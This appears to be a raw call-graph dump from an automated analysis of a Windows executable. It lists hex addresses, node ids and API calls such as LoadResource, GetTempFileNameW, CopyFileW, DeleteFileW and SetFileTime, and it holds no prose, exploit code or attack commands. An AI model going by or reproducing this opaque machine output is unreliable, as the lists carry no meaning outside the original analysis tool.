__fcloseall 83 API calls 94963->94964 94964->94967 94965 984272 94965->94882 94966 984283 FreeLibrary 94966->94965 94967->94965 94967->94966 96017 9c6ca9 GetFileAttributesW 94968->96017 94971->94882 94972->94906 94973->94900 94974->94903 94975->94903 95064 984214 94976->95064 94981 9f4f73 94983 984252 84 API calls 94981->94983 94982 9841d4 LoadLibraryExW 95074 984291 94982->95074 94985 9f4f7a 94983->94985 94987 984291 3 API calls 94985->94987 94989 9f4f82 94987->94989 95100 9844ed 94989->95100 94990 9841fb 94990->94989 94991 984207 94990->94991 94993 984252 84 API calls 94991->94993 94994 98420c 94993->94994 94994->94923 94994->94924 94997 9f4fa9 95108 984950 94997->95108 95001 9c6918 _wcschr __ftell_nolock 95000->95001 95002 9c692e _wcscat _wcscpy 95001->95002 95003 9a1dfc __wsplitpath 47 API calls 95001->95003 95002->94945 95004 9c695d 95003->95004 95005 9a1dfc __wsplitpath 47 API calls 95004->95005 95005->95002 95007 9cbfb1 __ftell_nolock 95006->95007 95008 99f4ea 48 API calls 95007->95008 95009 9cc00e 95008->95009 95010 9847b7 48 API calls 95009->95010 95011 9cc018 95010->95011 95012 9cbdb4 GetSystemTimeAsFileTime 95011->95012 95013 9cc023 95012->95013 95014 984517 83 API calls 95013->95014 95015 9cc036 _wcscmp 95014->95015 95016 9cc05a 95015->95016 95017 9cc107 95015->95017 95616 9cc56d 95016->95616 95019 9cc56d 94 API calls 95017->95019 95035 9cc0d3 _wcscat 95019->95035 95021 9a1dfc __wsplitpath 47 API calls 95026 9cc088 _wcscat _wcscpy 95021->95026 95022 9844ed 64 API calls 95024 9cc12c 95022->95024 95023 9cc110 95023->94951 95025 9844ed 64 API calls 95024->95025 95027 9cc13c 95025->95027 95029 9a1dfc __wsplitpath 47 API calls 95026->95029 95028 9844ed 64 API calls 95027->95028 95030 9cc157 95028->95030 95029->95035 95031 9844ed 64 API calls 95030->95031 95032 9cc167 95031->95032 95033 9844ed 64 API calls 95032->95033 95034 9cc182 95033->95034 95036 9844ed 64 API calls 95034->95036 95035->95022 95035->95023 95037 9cc192 95036->95037 95038 9844ed 64 API calls 95037->95038 95039 9cc1a2 95038->95039 95040 9844ed 64 API calls 95039->95040 95041 9cc1b2 95040->95041 95586 9cc71a GetTempPathW GetTempFileNameW 95041->95586 95043 9cc1be 95044 9a3499 117 API calls 95043->95044 95055 9cc1cf 95044->95055 95045 9cc289 95600 9a35e4 95045->95600 95047 9cc294 95049 9cc2ae 95047->95049 95050 9cc29a DeleteFileW 95047->95050 95048 9844ed 64 API calls 95048->95055 95051 9cc342 CopyFileW 95049->95051 95056 9cc2b8 95049->95056 95050->95023 95052 9cc358 DeleteFileW 95051->95052 95053 9cc36a DeleteFileW 95051->95053 95052->95023 95613 9cc6d9 CreateFileW 95053->95613 95055->95023 95055->95045 95055->95048 95587 9a2aae 95055->95587 95622 9cb965 95056->95622 95060 9cc331 DeleteFileW 95060->95023 95061->94914 95062->94935 95063->94942 95113 984339 95064->95113 95067 98423c 95069 9841bb 95067->95069 95070 984244 FreeLibrary 95067->95070 95071 9a3499 95069->95071 95070->95069 95121 9a34ae 95071->95121 95073 9841c8 95073->94981 95073->94982 95324 9842e4 95074->95324 95077 9842b8 95079 9841ec 95077->95079 95080 9842c1 FreeLibrary 95077->95080 95081 984380 95079->95081 95080->95079 95082 99f4ea 48 API calls 95081->95082 95083 984395 95082->95083 95084 9847b7 48 API calls 95083->95084 95085 9843a1 ___crtGetEnvironmentStringsW 95084->95085 95086 9843dc 95085->95086 95087 984499 95085->95087 95088 9844d1 95085->95088 95089 984950 57 API calls 95086->95089 95332 98406b CreateStreamOnHGlobal 95087->95332 95343 9cc750 93 API calls 95088->95343 95092 9843e5 95089->95092 95093 9844ed 64 API calls 95092->95093 95094 984479 95092->95094 95096 9f4ed7 95092->95096 95338 984517 95092->95338 95093->95092 95094->94990 95097 984517 83 API calls 95096->95097 95098 9f4eeb 95097->95098 95099 9844ed 64 API calls 95098->95099 95099->95094 95101 9844ff 95100->95101 95104 9f4fc0 95100->95104 95367 9a381e 95101->95367 95105 9cbf5a 95563 9cbdb4 95105->95563 95107 9cbf70 95107->94997 95109 98495f 95108->95109 95110 9f5002 95108->95110 95568 9a3e65 95109->95568 95112 984967 95117 98434b 95113->95117 95116 984321 LoadLibraryA GetProcAddress 95116->95067 95118 98422f 95117->95118 95119 984354 LoadLibraryA 95117->95119 95118->95067 95118->95116 95119->95118 95120 984365 GetProcAddress 95119->95120 95120->95118 95122 9a34ba _doexit 95121->95122 95123 9a34cd 95122->95123 95125 9a34fe 95122->95125 95169 9a7c0e 47 API calls __getptd_noexit 95123->95169 95140 9ae4c8 95125->95140 95126 9a34d2 95170 9a6e10 8 API calls __strnicmp_l 95126->95170 95129 9a3503 95130 9a3519 95129->95130 95131 9a350c 95129->95131 95133 9a3543 95130->95133 95134 9a3523 95130->95134 95171 9a7c0e 47 API calls __getptd_noexit 95131->95171 95154 9ae5e0 95133->95154 95172 9a7c0e 47 API calls __getptd_noexit 95134->95172 95135 9a34dd _doexit @_EH4_CallFilterFunc@8 95135->95073 95141 9ae4d4 _doexit 95140->95141 95174 9a7cf4 95141->95174 95143 9ae4e2 95144 9ae559 95143->95144 95152 9ae552 95143->95152 95184 9a7d7c 95143->95184 95207 9a4e5b 48 API calls __lock 95143->95207 95208 9a4ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 95143->95208 95209 9a69d0 95144->95209 95148 9ae56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95148->95152 95149 9ae5cc _doexit 95149->95129 95181 9ae5d7 95152->95181 95162 9ae600 __wopenfile 95154->95162 95155 9ae61a 95232 9a7c0e 47 API calls __getptd_noexit 95155->95232 95157 9ae61f 95233 9a6e10 8 API calls __strnicmp_l 95157->95233 95159 9ae838 95229 9b63c9 95159->95229 95160 9a354e 95173 9a3570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95160->95173 95162->95155 95168 9ae7d5 95162->95168 95234 9a185b 59 API calls 2 library calls 95162->95234 95164 9ae7ce 95164->95168 95235 9a185b 59 API calls 2 library calls 95164->95235 95166 9ae7ed 95166->95168 95236 9a185b 59 API calls 2 library calls 95166->95236 95168->95155 95168->95159 95169->95126 95170->95135 95171->95135 95172->95135 95173->95135 95175 9a7d18 RtlEnterCriticalSection 95174->95175 95176 9a7d05 95174->95176 95175->95143 95177 9a7d7c __mtinitlocknum 46 API calls 95176->95177 95178 9a7d0b 95177->95178 95178->95175 95215 9a115b 47 API calls 3 library calls 95178->95215 95216 9a7e58 RtlLeaveCriticalSection 95181->95216 95183 9ae5de 95183->95149 95185 9a7d88 _doexit 95184->95185 95186 9a7da9 95185->95186 95187 9a7d91 95185->95187 95189 9a69d0 __malloc_crt 46 API calls 95186->95189 95199 9a7dc9 _doexit 95186->95199 95217 9a81c2 47 API calls 2 library calls 95187->95217 95191 9a7dbd 95189->95191 95190 9a7d96 95218 9a821f 47 API calls 8 library calls 95190->95218 95193 9a7dd3 95191->95193 95194 9a7dc4 95191->95194 95197 9a7cf4 __lock 46 API calls 95193->95197 95220 9a7c0e 47 API calls __getptd_noexit 95194->95220 95195 9a7d9d 95219 9a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95195->95219 95200 9a7dda 95197->95200 95199->95143 95202 9a7de9 InitializeCriticalSectionAndSpinCount 95200->95202 95203 9a7dfe 95200->95203 95204 9a7e04 95202->95204 95221 9a1c9d 95203->95221 95227 9a7e1a RtlLeaveCriticalSection _doexit 95204->95227 95207->95143 95208->95143 95211 9a69de 95209->95211 95210 9a395c __crtGetStringTypeA_stat 46 API calls 95210->95211 95211->95210 95212 9a6a12 95211->95212 95213 9a69f1 Sleep 95211->95213 95212->95148 95212->95152 95214 9a6a0a 95213->95214 95214->95211 95214->95212 95216->95183 95217->95190 95218->95195 95220->95199 95222 9a1ccf _free 95221->95222 95223 9a1ca6 RtlFreeHeap 95221->95223 95222->95204 95223->95222 95224 9a1cbb 95223->95224 95228 9a7c0e 47 API calls __getptd_noexit 95224->95228 95226 9a1cc1 GetLastError 95226->95222 95227->95199 95228->95226 95237 9b5bb1 95229->95237 95231 9b63e2 95231->95160 95232->95157 95233->95160 95234->95164 95235->95166 95236->95168 95238 9b5bbd _doexit 95237->95238 95239 9b5bcf 95238->95239 95242 9b5c06 95238->95242 95321 9a7c0e 47 API calls __getptd_noexit 95239->95321 95241 9b5bd4 95322 9a6e10 8 API calls __strnicmp_l 95241->95322 95248 9b5c78 95242->95248 95245 9b5c23 95323 9b5c4c RtlLeaveCriticalSection __unlock_fhandle 95245->95323 95247 9b5bde _doexit 95247->95231 95249 9b5c98 95248->95249 95250 9a273b __wsopen_helper 47 API calls 95249->95250 95252 9b5cb4 95250->95252 95251 9a6e20 __invoke_watson 8 API calls 95253 9b63c8 95251->95253 95254 9b5cee 95252->95254 95260 9b5d11 95252->95260 95271 9b5deb 95252->95271 95255 9b5bb1 __wsopen_helper 104 API calls 95253->95255 95256 9a7bda __lseeki64 47 API calls 95254->95256 95257 9b63e2 95255->95257 95258 9b5cf3 95256->95258 95257->95245 95259 9a7c0e __strnicmp_l 47 API calls 95258->95259 95261 9b5d00 95259->95261 95262 9b5dcf 95260->95262 95269 9b5dad 95260->95269 95263 9a6e10 __strnicmp_l 8 API calls 95261->95263 95264 9a7bda __lseeki64 47 API calls 95262->95264 95266 9b5d0a 95263->95266 95265 9b5dd4 95264->95265 95267 9a7c0e __strnicmp_l 47 API calls 95265->95267 95266->95245 95268 9b5de1 95267->95268 95270 9a6e10 __strnicmp_l 8 API calls 95268->95270 95272 9aa979 __wsopen_helper 52 API calls 95269->95272 95270->95271 95271->95251 95273 9b5e7b 95272->95273 95274 9b5ea6 95273->95274 95275 9b5e85 95273->95275 95277 9b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95274->95277 95276 9a7bda __lseeki64 47 API calls 95275->95276 95278 9b5e8a 95276->95278 95288 9b5ec8 95277->95288 95279 9a7c0e __strnicmp_l 47 API calls 95278->95279 95281 9b5e94 95279->95281 95280 9b5f46 GetFileType 95282 9b5f93 95280->95282 95283 9b5f51 GetLastError 95280->95283 95286 9a7c0e __strnicmp_l 47 API calls 95281->95286 95293 9aac0b __set_osfhnd 48 API calls 95282->95293 95287 9a7bed __dosmaperr 47 API calls 95283->95287 95284 9b5f14 GetLastError 95285 9a7bed __dosmaperr 47 API calls 95284->95285 95289 9b5f39 95285->95289 95286->95266 95290 9b5f78 CloseHandle 95287->95290 95288->95280 95288->95284 95291 9b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95288->95291 95295 9a7c0e __strnicmp_l 47 API calls 95289->95295 95290->95289 95294 9b5f86 95290->95294 95292 9b5f09 95291->95292 95292->95280 95292->95284 95299 9b5fb1 95293->95299 95296 9a7c0e __strnicmp_l 47 API calls 95294->95296 95295->95271 95297 9b5f8b 95296->95297 95297->95289 95298 9b616c 95298->95271 95301 9b633f CloseHandle 95298->95301 95299->95298 95300 9af82f __lseeki64_nolock 49 API calls 95299->95300 95318 9b6032 95299->95318 95302 9b601b 95300->95302 95303 9b5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95301->95303 95305 9a7bda __lseeki64 47 API calls 95302->95305 95302->95318 95304 9b6366 95303->95304 95306 9b636e GetLastError 95304->95306 95307 9b639a 95304->95307 95305->95318 95308 9a7bed __dosmaperr 47 API calls 95306->95308 95307->95271 95309 9b637a 95308->95309 95313 9aab1e __free_osfhnd 48 API calls 95309->95313 95310 9aee0e 59 API calls __wsopen_helper 95310->95318 95311 9aea9c __close_nolock 50 API calls 95311->95318 95312 9b6f40 __chsize_nolock 81 API calls 95312->95318 95313->95307 95314 9aaf61 __flush 78 API calls 95314->95318 95315 9b61e9 95317 9aea9c __close_nolock 50 API calls 95315->95317 95316 9af82f 49 API calls __lseeki64_nolock 95316->95318 95319 9b61f0 95317->95319 95318->95298 95318->95310 95318->95311 95318->95312 95318->95314 95318->95315 95318->95316 95320 9a7c0e __strnicmp_l 47 API calls 95319->95320 95320->95271 95321->95241 95322->95247 95323->95247 95328 9842f6 95324->95328 95327 9842cc LoadLibraryA GetProcAddress 95327->95077 95329 9842aa 95328->95329 95330 9842ff LoadLibraryA 95328->95330 95329->95077 95329->95327 95330->95329 95331 984310 GetProcAddress 95330->95331 95331->95329 95333 984085 FindResourceExW 95332->95333 95337 9840a2 95332->95337 95334 9f4f16 LoadResource 95333->95334 95333->95337 95335 9f4f2b SizeofResource 95334->95335 95334->95337 95336 9f4f3f LockResource 95335->95336 95335->95337 95336->95337 95337->95086 95339 984526 95338->95339 95340 9f4fe0 95338->95340 95344 9a3a8d 95339->95344 95342 984534 95342->95092 95343->95086 95345 9a3a99 _doexit 95344->95345 95346 9a3aa7 95345->95346 95347 9a3acd 95345->95347 95357 9a7c0e 47 API calls __getptd_noexit 95346->95357 95359 9a4e1c 95347->95359 95350 9a3aac 95358 9a6e10 8 API calls __strnicmp_l 95350->95358 95354 9a3ab7 _doexit 95354->95342 95355 9a3ae2 95366 9a3b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95355->95366 95357->95350 95358->95354 95360 9a4e4e RtlEnterCriticalSection 95359->95360 95361 9a4e2c 95359->95361 95362 9a3ad3 95360->95362 95361->95360 95363 9a4e34 95361->95363 95365 9a39fe 81 API calls 3 library calls 95362->95365 95364 9a7cf4 __lock 47 API calls 95363->95364 95364->95362 95365->95355 95366->95354 95370 9a3839 95367->95370 95369 984510 95369->95105 95372 9a3845 _doexit 95370->95372 95371 9a3880 _doexit 95371->95369 95372->95371 95373 9a385b _memset 95372->95373 95374 9a3888 95372->95374 95397 9a7c0e 47 API calls __getptd_noexit 95373->95397 95375 9a4e1c __lock_file 48 API calls 95374->95375 95376 9a388e 95375->95376 95383 9a365b 95376->95383 95379 9a3875 95398 9a6e10 8 API calls __strnicmp_l 95379->95398 95384 9a3691 95383->95384 95386 9a3676 _memset 95383->95386 95399 9a38c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95384->95399 95385 9a3681 95495 9a7c0e 47 API calls __getptd_noexit 95385->95495 95386->95384 95386->95385 95388 9a36cf 95386->95388 95388->95384 95391 9a37e0 _memset 95388->95391 95400 9a2933 95388->95400 95407 9aee0e 95388->95407 95475 9aeb66 95388->95475 95497 9aec87 47 API calls 3 library calls 95388->95497 95498 9a7c0e 47 API calls __getptd_noexit 95391->95498 95396 9a3686 95496 9a6e10 8 API calls __strnicmp_l 95396->95496 95397->95379 95398->95371 95399->95371 95401 9a293d 95400->95401 95402 9a2952 95400->95402 95499 9a7c0e 47 API calls __getptd_noexit 95401->95499 95402->95388 95404 9a2942 95500 9a6e10 8 API calls __strnicmp_l 95404->95500 95406 9a294d 95406->95388 95408 9aee2f 95407->95408 95409 9aee46 95407->95409 95510 9a7bda 47 API calls __getptd_noexit 95408->95510 95410 9af57e 95409->95410 95414 9aee80 95409->95414 95525 9a7bda 47 API calls __getptd_noexit 95410->95525 95413 9aee34 95511 9a7c0e 47 API calls __getptd_noexit 95413->95511 95417 9aee88 95414->95417 95425 9aee9f 95414->95425 95415 9af583 95526 9a7c0e 47 API calls __getptd_noexit 95415->95526 95512 9a7bda 47 API calls __getptd_noexit 95417->95512 95420 9aee8d 95513 9a7c0e 47 API calls __getptd_noexit 95420->95513 95421 9aee94 95527 9a6e10 8 API calls __strnicmp_l 95421->95527 95423 9aeeb4 95514 9a7bda 47 API calls __getptd_noexit 95423->95514 95424 9aeece 95424->95423 95430 9aeed9 95424->95430 95425->95423 95425->95424 95428 9aeeec 95425->95428 95456 9aee3b 95425->95456 95429 9a69d0 __malloc_crt 47 API calls 95428->95429 95431 9aeefc 95429->95431 95501 9b3bf2 95430->95501 95433 9aef1f 95431->95433 95434 9aef04 95431->95434 95517 9af82f 49 API calls 3 library calls 95433->95517 95515 9a7c0e 47 API calls __getptd_noexit 95434->95515 95435 9aefed 95438 9af066 ReadFile 95435->95438 95439 9af003 GetConsoleMode 95435->95439 95441 9af088 95438->95441 95442 9af546 GetLastError 95438->95442 95443 9af063 95439->95443 95444 9af017 95439->95444 95440 9aef09 95516 9a7bda 47 API calls __getptd_noexit 95440->95516 95441->95442 95449 9af058 95441->95449 95446 9af046 95442->95446 95447 9af553 95442->95447 95443->95438 95444->95443 95448 9af01d ReadConsoleW 95444->95448 95457 9af04c 95446->95457 95518 9a7bed 47 API calls 3 library calls 95446->95518 95523 9a7c0e 47 API calls __getptd_noexit 95447->95523 95448->95449 95451 9af040 GetLastError 95448->95451 95449->95457 95460 9af0bd 95449->95460 95461 9af32a 95449->95461 95451->95446 95453 9af558 95524 9a7bda 47 API calls __getptd_noexit 95453->95524 95455 9a1c9d _free 47 API calls 95455->95456 95456->95388 95457->95455 95457->95456 95459 9af129 ReadFile 95463 9af14a GetLastError 95459->95463 95474 9af154 95459->95474 95460->95459 95468 9af1aa 95460->95468 95461->95457 95462 9af430 ReadFile 95461->95462 95467 9af453 GetLastError 95462->95467 95473 9af461 95462->95473 95463->95474 95464 9af267 95469 9af217 MultiByteToWideChar 95464->95469 95521 9af82f 49 API calls 3 library calls 95464->95521 95465 9af257 95520 9a7c0e 47 API calls __getptd_noexit 95465->95520 95467->95473 95468->95457 95468->95464 95468->95465 95468->95469 95469->95451 95469->95457 95473->95461 95522 9af82f 49 API calls 3 library calls 95473->95522 95474->95460 95519 9af82f 49 API calls 3 library calls 95474->95519 95476 9aeb71 95475->95476 95480 9aeb86 95475->95480 95558 9a7c0e 47 API calls __getptd_noexit 95476->95558 95478 9aeb76 95559 9a6e10 8 API calls __strnicmp_l 95478->95559 95481 9aebbb 95480->95481 95487 9aeb81 95480->95487 95560 9b3e24 95480->95560 95483 9a2933 __ftell_nolock 47 API calls 95481->95483 95484 9aebcf 95483->95484 95528 9aed06 95484->95528 95486 9aebd6 95486->95487 95488 9a2933 __ftell_nolock 47 API calls 95486->95488 95487->95388 95489 9aebf9 95488->95489 95489->95487 95490 9a2933 __ftell_nolock 47 API calls 95489->95490 95491 9aec05 95490->95491 95491->95487 95492 9a2933 __ftell_nolock 47 API calls 95491->95492 95493 9aec12 95492->95493 95494 9a2933 __ftell_nolock 47 API calls 95493->95494 95494->95487 95495->95396 95496->95384 95497->95388 95498->95396 95499->95404 95500->95406 95502 9b3c0a 95501->95502 95503 9b3bfd 95501->95503 95506 9b3c16 95502->95506 95507 9a7c0e __strnicmp_l 47 API calls 95502->95507 95504 9a7c0e __strnicmp_l 47 API calls 95503->95504 95505 9b3c02 95504->95505 95505->95435 95506->95435 95508 9b3c37 95507->95508 95509 9a6e10 __strnicmp_l 8 API calls 95508->95509 95509->95505 95510->95413 95511->95456 95512->95420 95513->95421 95514->95420 95515->95440 95516->95456 95517->95430 95518->95457 95519->95474 95520->95457 95521->95469 95522->95473 95523->95453 95524->95457 95525->95415 95526->95421 95527->95456 95529 9aed12 _doexit 95528->95529 95530 9aed1a 95529->95530 95531 9aed32 95529->95531 95533 9a7bda __lseeki64 47 API calls 95530->95533 95532 9aeded 95531->95532 95536 9aed68 95531->95536 95534 9a7bda __lseeki64 47 API calls 95532->95534 95535 9aed1f 95533->95535 95537 9aedf2 95534->95537 95538 9a7c0e __strnicmp_l 47 API calls 95535->95538 95539 9aed8a 95536->95539 95540 9aed75 95536->95540 95541 9a7c0e __strnicmp_l 47 API calls 95537->95541 95547 9aed27 _doexit 95538->95547 95543 9aa8ed ___lock_fhandle 49 API calls 95539->95543 95542 9a7bda __lseeki64 47 API calls 95540->95542 95544 9aed82 95541->95544 95545 9aed7a 95542->95545 95546 9aed90 95543->95546 95551 9a6e10 __strnicmp_l 8 API calls 95544->95551 95548 9a7c0e __strnicmp_l 47 API calls 95545->95548 95549 9aeda3 95546->95549 95550 9aedb6 95546->95550 95547->95486 95548->95544 95553 9aee0e __wsopen_helper 59 API calls 95549->95553 95552 9a7c0e __strnicmp_l 47 API calls 95550->95552 95551->95547 95554 9aedbb 95552->95554 95555 9aedaf 95553->95555 95556 9a7bda __lseeki64 47 API calls 95554->95556 95557 9aede5 __filbuf RtlLeaveCriticalSection 95555->95557 95556->95555 95557->95547 95558->95478 95559->95487 95561 9a69d0 __malloc_crt 47 API calls 95560->95561 95562 9b3e39 95561->95562 95562->95481 95566 9a344a GetSystemTimeAsFileTime 95563->95566 95565 9cbdc3 95565->95107 95567 9a3478 __aulldiv 95566->95567 95567->95565 95569 9a3e71 _doexit 95568->95569 95570 9a3e7f 95569->95570 95571 9a3e94 95569->95571 95582 9a7c0e 47 API calls __getptd_noexit 95570->95582 95573 9a4e1c __lock_file 48 API calls 95571->95573 95575 9a3e9a 95573->95575 95574 9a3e84 95583 9a6e10 8 API calls __strnicmp_l 95574->95583 95584 9a3b0c 55 API calls 4 library calls 95575->95584 95578 9a3ea5 95585 9a3ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95578->95585 95580 9a3eb7 95581 9a3e8f _doexit 95580->95581 95581->95112 95582->95574 95583->95581 95584->95578 95585->95580 95586->95043 95588 9a2aba _doexit 95587->95588 95589 9a2aec 95588->95589 95590 9a2ad4 95588->95590 95592 9a2ae4 _doexit 95588->95592 95593 9a4e1c __lock_file 48 API calls 95589->95593 95665 9a7c0e 47 API calls __getptd_noexit 95590->95665 95592->95055 95595 9a2af2 95593->95595 95594 9a2ad9 95666 9a6e10 8 API calls __strnicmp_l 95594->95666 95653 9a2957 95595->95653 95601 9a35f0 _doexit 95600->95601 95602 9a361c 95601->95602 95603 9a3604 95601->95603 95605 9a4e1c __lock_file 48 API calls 95602->95605 95612 9a3614 _doexit 95602->95612 95845 9a7c0e 47 API calls __getptd_noexit 95603->95845 95607 9a362e 95605->95607 95606 9a3609 95846 9a6e10 8 API calls __strnicmp_l 95606->95846 95829 9a3578 95607->95829 95612->95047 95614 9cc6ff SetFileTime CloseHandle 95613->95614 95615 9cc715 95613->95615 95614->95615 95615->95023 95621 9cc581 __tzset_nolock _wcscmp 95616->95621 95617 9cc05f 95617->95021 95617->95023 95618 9844ed 64 API calls 95618->95621 95619 9cbf5a GetSystemTimeAsFileTime 95619->95621 95620 984517 83 API calls 95620->95621 95621->95617 95621->95618 95621->95619 95621->95620 95623 9cb97e 95622->95623 95624 9cb970 95622->95624 95626 9cb9c3 95623->95626 95627 9a3499 117 API calls 95623->95627 95652 9cb987 95623->95652 95625 9a3499 117 API calls 95624->95625 95625->95623 95919 9cbbe8 95626->95919 95628 9cb9a8 95627->95628 95628->95626 95631 9cb9b1 95628->95631 95630 9cba07 95632 9cba2c 95630->95632 95633 9cba0b 95630->95633 95634 9a35e4 __fcloseall 83 API calls 95631->95634 95631->95652 95923 9cb7e5 95632->95923 95636 9a35e4 __fcloseall 83 API calls 95633->95636 95637 9cba18 95633->95637 95634->95652 95636->95637 95639 9a35e4 __fcloseall 83 API calls 95637->95639 95637->95652 95639->95652 95640 9cba5a 95932 9cba8a 95640->95932 95641 9cba3a 95643 9cba47 95641->95643 95645 9a35e4 __fcloseall 83 API calls 95641->95645 95643->95652 95645->95643 95652->95053 95652->95060 95655 9a2966 95653->95655 95660 9a2984 95653->95660 95654 9a2974 95714 9a7c0e 47 API calls __getptd_noexit 95654->95714 95655->95654 95655->95660 95662 9a299c ___crtGetEnvironmentStringsW 95655->95662 95657 9a2979 95715 9a6e10 8 API calls __strnicmp_l 95657->95715 95667 9a2b24 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95660->95667 95662->95660 95663 9a2933 __ftell_nolock 47 API calls 95662->95663 95668 9aaf61 95662->95668 95693 9a8e63 95662->95693 95716 9a2c84 95662->95716 95663->95662 95665->95594 95666->95592 95667->95592 95669 9aaf6d _doexit 95668->95669 95670 9aaf75 95669->95670 95672 9aaf8d 95669->95672 95795 9a7bda 47 API calls __getptd_noexit 95670->95795 95671 9ab022 95800 9a7bda 47 API calls __getptd_noexit 95671->95800 95672->95671 95677 9aafbf 95672->95677 95675 9aaf7a 95796 9a7c0e 47 API calls __getptd_noexit 95675->95796 95676 9ab027 95801 9a7c0e 47 API calls __getptd_noexit 95676->95801 95722 9aa8ed 95677->95722 95681 9ab02f 95802 9a6e10 8 API calls __strnicmp_l 95681->95802 95682 9aafc5 95684 9aafeb 95682->95684 95685 9aafd8 95682->95685 95797 9a7c0e 47 API calls __getptd_noexit 95684->95797 95731 9ab043 95685->95731 95687 9aaf82 _doexit 95687->95662 95689 9aafe4 95799 9ab01a RtlLeaveCriticalSection __unlock_fhandle 95689->95799 95690 9aaff0 95798 9a7bda 47 API calls __getptd_noexit 95690->95798 95694 9a2933 __ftell_nolock 47 API calls 95693->95694 95695 9a8e71 95694->95695 95696 9a8e7c 95695->95696 95697 9a8e93 95695->95697 95826 9a7c0e 47 API calls __getptd_noexit 95696->95826 95699 9a8e98 95697->95699 95708 9a8ea5 _wprintf 95697->95708 95827 9a7c0e 47 API calls __getptd_noexit 95699->95827 95701 9a8eff 95702 9a8f09 95701->95702 95703 9a8f83 95701->95703 95705 9a8f23 95702->95705 95710 9a8f3a 95702->95710 95704 9aaf61 __flush 78 API calls 95703->95704 95707 9a8e81 95704->95707 95706 9aaf61 __flush 78 API calls 95705->95706 95706->95707 95707->95662 95708->95701 95708->95707 95709 9b3bf2 __stbuf 47 API calls 95708->95709 95711 9a8ef4 95708->95711 95709->95711 95710->95707 95828 9af733 52 API calls 5 library calls 95710->95828 95711->95701 95713 9b3e24 __getbuf 47 API calls 95711->95713 95713->95701 95714->95657 95715->95660 95717 9a2cbb 95716->95717 95718 9a2c97 95716->95718 95717->95662 95718->95717 95719 9a2933 __ftell_nolock 47 API calls 95718->95719 95720 9a2cb4 95719->95720 95721 9aaf61 __flush 78 API calls 95720->95721 95721->95717 95723 9aa8f9 _doexit 95722->95723 95724 9aa946 RtlEnterCriticalSection 95723->95724 95725 9a7cf4 __lock 47 API calls 95723->95725 95726 9aa96c _doexit 95724->95726 95727 9aa91d 95725->95727 95726->95682 95728 9aa93a 95727->95728 95729 9aa928 InitializeCriticalSectionAndSpinCount 95727->95729 95803 9aa970 RtlLeaveCriticalSection _doexit 95728->95803 95729->95728 95732 9ab050 __ftell_nolock 95731->95732 95733 9ab0ac 95732->95733 95734 9ab08d 95732->95734 95762 9ab082 95732->95762 95737 9ab105 95733->95737 95738 9ab0e9 95733->95738 95804 9a7bda 47 API calls __getptd_noexit 95734->95804 95742 9ab11c 95737->95742 95810 9af82f 49 API calls 3 library calls 95737->95810 95807 9a7bda 47 API calls __getptd_noexit 95738->95807 95739 9ab86b 95739->95689 95740 9ab092 95805 9a7c0e 47 API calls __getptd_noexit 95740->95805 95746 9b3bf2 __stbuf 47 API calls 95742->95746 95745 9ab099 95749 9ab12a 95746->95749 95747 9ab0ee 95808 9a7c0e 47 API calls __getptd_noexit 95747->95808 95818 9aa70c 95762->95818 95795->95675 95796->95687 95797->95690 95798->95689 95799->95687 95800->95676 95801->95681 95802->95687 95803->95724 95804->95740 95805->95745 95807->95747 95810->95742 95819 9aa716 IsProcessorFeaturePresent 95818->95819 95820 9aa714 95818->95820 95822 9b37b0 95819->95822 95820->95739 95826->95707 95827->95707 95828->95707 95830 9a359b 95829->95830 95831 9a3587 95829->95831 95834 9a2c84 __flush 78 API calls 95830->95834 95837 9a3597 95830->95837 95875 9a7c0e 47 API calls __getptd_noexit 95831->95875 95833 9a358c 95876 9a6e10 8 API calls __strnicmp_l 95833->95876 95836 9a35a7 95834->95836 95848 9aeb36 95836->95848 95847 9a3653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95837->95847 95840 9a2933 __ftell_nolock 47 API calls 95841 9a35b5 95840->95841 95852 9ae9d2 95841->95852 95843 9a35bb 95843->95837 95844 9a1c9d _free 47 API calls 95843->95844 95844->95837 95845->95606 95846->95612 95847->95612 95849 9a35af 95848->95849 95850 9aeb43 95848->95850 95849->95840 95850->95849 95851 9a1c9d _free 47 API calls 95850->95851 95851->95849 95853 9ae9de _doexit 95852->95853 95854 9ae9fe 95853->95854 95855 9ae9e6 95853->95855 95856 9aea7b 95854->95856 95861 9aea28 95854->95861 95892 9a7bda 47 API calls __getptd_noexit 95855->95892 95896 9a7bda 47 API calls __getptd_noexit 95856->95896 95858 9ae9eb 95893 9a7c0e 47 API calls __getptd_noexit 95858->95893 95860 9aea80 95897 9a7c0e 47 API calls __getptd_noexit 95860->95897 95864 9aa8ed ___lock_fhandle 49 API calls 95861->95864 95866 9aea2e 95864->95866 95865 9aea88 95898 9a6e10 8 API calls __strnicmp_l 95865->95898 95868 9aea4c 95866->95868 95869 9aea41 95866->95869 95894 9a7c0e 47 API calls __getptd_noexit 95868->95894 95877 9aea9c 95869->95877 95871 9ae9f3 _doexit 95871->95843 95873 9aea47 95895 9aea73 RtlLeaveCriticalSection __unlock_fhandle 95873->95895 95875->95833 95876->95837 95899 9aaba4 95877->95899 95892->95858 95893->95871 95894->95873 95895->95871 95896->95860 95897->95865 95898->95871 95900 9aabaf 95899->95900 95902 9aabc4 95899->95902 95914 9a7bda 47 API calls __getptd_noexit 95900->95914 95920 9cbc0d 95919->95920 95921 9cbbf6 __tzset_nolock ___crtGetEnvironmentStringsW 95919->95921 95922 9a381e __fread_nolock 64 API calls 95920->95922 95921->95630 95922->95921 95924 9a395c __crtGetStringTypeA_stat 47 API calls 95923->95924 95925 9cb7f4 95924->95925 95926 9a395c __crtGetStringTypeA_stat 47 API calls 95925->95926 95927 9cb808 95926->95927 95928 9a395c __crtGetStringTypeA_stat 47 API calls 95927->95928 95929 9cb81c 95928->95929 95930 9cbb64 47 API calls 95929->95930 95931 9cb82f 95929->95931 95930->95931 95931->95640 95931->95641 95981 986b0f 48 API calls 95980->95981 